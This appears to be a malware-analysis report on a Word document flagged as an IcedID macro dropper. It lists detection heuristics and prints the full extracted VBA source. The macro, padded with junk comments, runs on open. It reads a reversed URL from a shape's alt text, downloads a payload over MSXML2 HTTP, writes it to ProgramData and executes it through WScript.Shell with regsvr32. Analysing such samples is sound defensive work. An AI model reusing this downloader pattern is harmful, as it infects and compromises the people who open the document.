MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set nzcgf = CreateObject("Script" + hSCIM) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11974 bytes |
SHA-256: 5bab1efeae6dc88875b64f805f8daba1a42150348d7ab81fd7c70222569c5c89 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sksSJ"
Sub Odolo(kVQgh, Optional ByVal cREuZ As String = "c:\programdata\Cxvdv.txt", Optional ByVal hSCIM As String = "ing.FileSystemObject")
' Enviably scheme infectious celebrities
' Teleworking regrowth dance wisely
' Lira
' Gambia snows
' Hotpot criminality
' Girdled
' Choose eyeglass enveloping pruritus injury mush
' Ribald equalities
' Longlasting fells fowl
' Interpretative deviants stimulates dreams coursing
' Gulped carriageway aerobes
' Hopes scarp massaged biz amplifier
' Overrule enriched comeliness shrew nymph omnipresence
' Eyeshadow whipped closed mestizo choices
' Atone juxtaposition verdicts cirrhosis vibrational
' Serviceman magnetically pranksters eschew acute
' Hussy chairlift eggheads
' Sloths purportedly juniors applicants shamanistic
Set nzcgf = CreateObject("Script" + hSCIM)
' Galvanometer supplicant windy
' Super fried
' Spurious enlargement cluster crate safeness
' Tendentiously yens sos
' Blurred
' Module finitely drays
Set yzOpB = nzcgf.CreateTextFile(cREuZ)
' Blister straightest
' Tutu
' Bothersome invigorated
' Preambles premised gallant mingled
yzOpB.WriteLine kVQgh
' Jocularity matting detains
' Maturely cupolas nogging aerospace
' Luminaries scotch caymans
' Basest
' Quirkier queerly
' Reasonable plagues watts
' Payday comparison
yzOpB.Close
' Mitosis
' Bewilderment elliptic
' Stapling
' Gingers unawares asparagus rescheduled
' Bowsprit debase baddy satinwood fatherinlaw smother
' Interchanged consanguineous rooster
' Forgo bacon untutored quadratic
' Destruction fleshy technicality quartet
' Andrew permissibility grafting
' Quince outskirts
' Lesbians curve
' Incumbent resistive niggling regularities vacancy
' Stink rebuking
' Indispensability infidelity horrified manors symbolical
' Finitely
' Thanks terser spotlessness linearly driers barrows cunnilingus
' Assailant begs aconite
' Speediest wapitis
' Inflicter grille apocalypse deportees
' Candle parlour statuses builds oppositional lukewarm
' Pecuniary vests
' Chloride
' Cooks
' Concertina dissimulation fifthly bursars
' Sorrows obscenely
' Verge potion airgun bubblegum swabbed
' Apologist redirecting beat
' Semitics permute constabulary
' Volumetric dirt ensemble
' Elves impudently gimmick default
' Topographic
' Soaker termly tantalise escarpment
' Multiplexes ocular perfumed hierarch auditioned
' Ell resonators citizen
' Rudder fruitless
' Irreverence squabbled evacuating
' Befuddling coronations boers unfitness maps presidential
' Serials buries ooh alcoholics
End Sub
' Requiems
' Coriander
' Amendable unit
' Snaffle lurk philologist deferment vorticity
' Lustily husked trait irritable plough
Sub AutoOpen()
' Tanneries tarpaulins decoying steeple orientates costefficient
' Gracing reassured consort infelicities mercury coxcombs
' Unhand
' Romped decaffeinate retyped innards typists
' Uncomfortableness expanses processed timehonoured redistributing issuable
' Culprits spectroscope
' Flaming
' Undeniably neptune scowl
' Spinster comity reconsult peregrine funnels
' Salesperson backlogs unfold shrubberies bitterness
' Tailing dressmaking appals fiercer
' Remotest reserves unawares gusts ejects
' Lesions garotte squeakiest microorganisms memorandums
' Chaotically engulfed
' Landscaping foxes hale
' Demurs
' Valency
' Ampersand gabble purses stored
' Geopolitical troughs inaccessibility
' Cleaves familiarising baffler flours
' Semester sunspot gardens extravaganza
' Insolvencies
' Incinerators moodily
' Mouthing athletically gloved retaking
' Constitutively
' Trudges stigma symptomless liberality
' Intensively bacillus solves fading overhaul
' Trickily luscious remembrance infects astonishment
' Oversized refuels subordinate katydid exercising
Dim GApMc As New LueRV
' Effeminacy terse tricked
' Fullscale smelliest ledge
' Chandelier
' Distilleries
' Cry kindle interplay oration pomp
' Wags dip annexing annihilation maverick incongruities
' Nonsmokers pats creeper trenches ballbearings ascertained
kVQgh = GApMc.beOHg("MSXML2.serverXMLHTTP")
' Convocations gad underworld
' Mutilates jubilate instability
' Lad sobs expectations
' Boyish
' Participles kite
' Entombment lachrymose lankier borders fractal bumbles
Odolo PJwhh(kVQgh)
' Sheepskins
' Hayfever seaworthy futon
' Soandso traumatise fixed warm
' Goulash solecisms
' Anorexia freshness banger
' Silicate birds
' Trilobite romany maliciousness spars hayfever
' Sailcloth
' Empowered
' Holocausts predestined downcast
OHsES DvsXy(0) + "vr32 c:\programdata\Cxvdv.txt", "ws"
End Sub
Function fTGBu(sSToB, gZNTr)
' Urbanites painted sociologists incompressible
' Disembarking dying subventions needlecraft
' Hardship sportsmen
' Illtempered thieved
' Botulism biotechnologist undertook descents
fTGBu = Split(sSToB, gZNTr)
End Function
Attribute VB_Name = "ZDuaI"
' Neurological fluctuated improvident examiners
' Bamboozled watercolourists
' Billy authenticator
' Resolvent shade unconstrained regretted
' Assonance credentials refinanced
Function PJwhh(Rcfup)
' Wast subsoil rediscovering pallmall sabbath aphelion
' Clogged wayside lifebelt
' Videos riveter expands
' Fresher geomorphology untruth
' Tremblingly bream dwelling belatedness
PJwhh = StrConv(Rcfup, vbUnicode)
' Flutes anna
' Purifier babas frittering sickbed
' Parches furtherance harmony swearers officer
' Tamely rescheduling securing fuddle
' Voodoo steppes spoilt
' Weightlifters fuzz dextral
End Function
' Slumps prospects mildness
' Gongs replacements longlost soandso
' Reallocation cobra benefice ported
' Decongestants motorcade repudiate unmodified
' Refund ransacked visit
' Complainingly violate
Function lzXjd()
' Prejudged elephant beaked accusingly placates
' Orthodontist grands
' Biological chomping notoriously
' Motioned isomorphic conference follower snowing
' Caller gardeners unprecedentedly skirts
' Easement gastric
' Snoozing mapped traditionally
' Shallots stealthy correctional
' Looms ontological cagy proficiency
With ActiveDocument.shapes(1)
lzXjd = .AlternativeText
End With
End Function
' Sibilant steeds
' Chihuahua whiles deltoid coiling
' Snakeskin loved
' Consequence innovated
' Relativity wash coordinators shiftily
Function DvsXy(zOuhh)
' Detaching encampments weaker
' Tussling exclusive property
' Rashes toucher ranges
' Enshrining subcontract
' Referenced realty bisected
' Unethically debts
' Nights
' Repackage externals trident harmless
' Narcosis snowdrops wellgrounded
' Stager
' Projections redo homed riffled
pHIDY = lzXjd()
BgvfY = fTGBu(pHIDY, "###")
DqZYN = BgvfY(zOuhh)
DvsXy = DqZYN
End Function
Attribute VB_Name = "LueRV"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Usury
' Acetal traitorous gruffness turnovers epidermis
' Scene spoonful spared
' Odometer stolen november billposters regenerates overturns
' Vicepresident incas purvey
' Channelled riveted matriculation shiftily coital headlights protected
Function beOHg(otgPh)
' Crestfallen rips deposed municipality
' Playboys birdwatching
' Diplomatic beast completeness
' Orthogonality godmother tutors subscribed crisis
' Imminence encumber
Dim eSlYS As Object
' Conception cowboys thanks
' Lorries
' Superficial fedup any
' Emigres streak
' Iota saner polytechnics exchangeable
' Blackberries chartists overgrowth freons
' Hectically worming vaguest traverse malays
' Guffaw
' Pinpointing ripostes corresponded accredit implant match
' Misconceptions continue curdling buffet
' Exhuming presume forsakes assemble
' Dealership sneakier
' Approve plunging
' Dreary deferentially trouncing cargo
' Siesta large softening understands encases
Set eSlYS = CreateObject(otgPh)
' Instigated shielded values
' Pacemakers hermitage
' Vote
' Quorate meltdown coastlands dabbing
' Whodunnit rattles
' Funk differing lenses rhapsodic
' Hesitating naturally slyer
' Hires
' Mode
' Swoons licensing hostile thematically
' Durations hoodlum pub
' Singable hedges seafarer
' Tributes incas translations
' Penthouse spectroscopy sociably
' Professes probation
' Hubristic
' Centre celebrities
' Bareback holier commission swerving portrayals
' Chopin springbok mutters unrehearsed
tsAQk = DvsXy(1)
' Reconsider ravishes zenith
' Phonology adaptivity strikes
' Distrusted inimitably overdone befog stringencies assessment achingly
' Gratification parametrically spurred eviction
' Shrewd undecided lengthwise
' Ovations
' Cyclically equalities tracing negating
eSlYS.Open "GET", Reverse(tsAQk), False
' Cockiest
' Ripping conjugating reseeding wallpaper
' Tinnitus
' Hallowed sections elocution mildews pogrom grittiest
' Vivacious boxers hygienist
eSlYS.Send
' Lifeboatmen desolate teeny
' Unities exempting divergence twined
' Impacted extrasolar dramatisations
' Repents medicate
' Blondest aura rites superposition delays
' Audits recursions blinds sector
' Largest agronomy
beOHg = eSlYS.responsebody
End Function
Attribute VB_Name = "XuUux"
Sub OHsES(NoGpK, MBZYi)
' Harems patois finishes compressed
' Housebound moron displaces brittleness
' Grovelled chuck dripping decadence
' Chromosomes rendition preside exodus
Set sbfbU = CreateObject(MBZYi + "cript.shell")
' Backstreets workforces sobbed able
' Skipper griped hackneyed severer crenellated plectrums dubbing
' Ranks insubstantial sulky
' Stouter expensive cabbages omelettes punky
' Inactivated crucial pantomimes nosiness bailing defaced
' Indelicacy slav
' Narrators bookcase view occluded
' Dyestuffs disquieting unexcited
' Proneness firelight bugging candies
' Northbound
' Colonialists appraise
' Domesticated point mountings
' Envelopers semantically compound masterminded gravitationally shovelled
' Reverting
' Stockinged pooh prudence voluptuousness promotional
' Phonologically magnificently televise smocks rasp
' Valuing
' Burbles
' Domes countdown quartered spellbinding misfortune idealism
' Epidermal potentate
' Proverbial adjure vertebrates preparative
' Speculative
' Combativeness tightening
' Whelp flue deterring auditors
' Cobbles vacuum spinner transliterate chump
' Disorient organises fascias orphans newcomer
' Gamy
' Definitional nadir
' Hitchhike communism
' Droppings fitfully grapples incursion hotdogs monopolist flattish stirrup
' Reaches trilobites bicarbonate
' Weighted campanologist aspirational endears
' Impalpable resilient
' Devisal stingier sportive
' Hungrily acquiescing replying adultery sightings
' Addictiveness moderations wholesome
' Radiograph secedes
' Recordings passers racket
' Plushy voiced
' Brides injokes
' Baptism commit sahib stratospherically
' Stayers haggler briefcase
' Airfields plastic prevarication gorgeous incalculably
' Isothermal supposing serf
' Potency shamefacedly
sbfbU.exec NoGpK
' Perished deprivation patriot
' Nest swerving moot titanium strut smithy
' Rebuttals highheeled dendrochronology diabolically vegetate indicated quartets
' Clothespegs reparations culpable
' Vocalist
' Acutest mellows pernicious pancakes
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes |
SHA-256: c0e35ee89dceec01ce93f7324aae169b8732803049a320f9aca5adb12c1db3fe |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.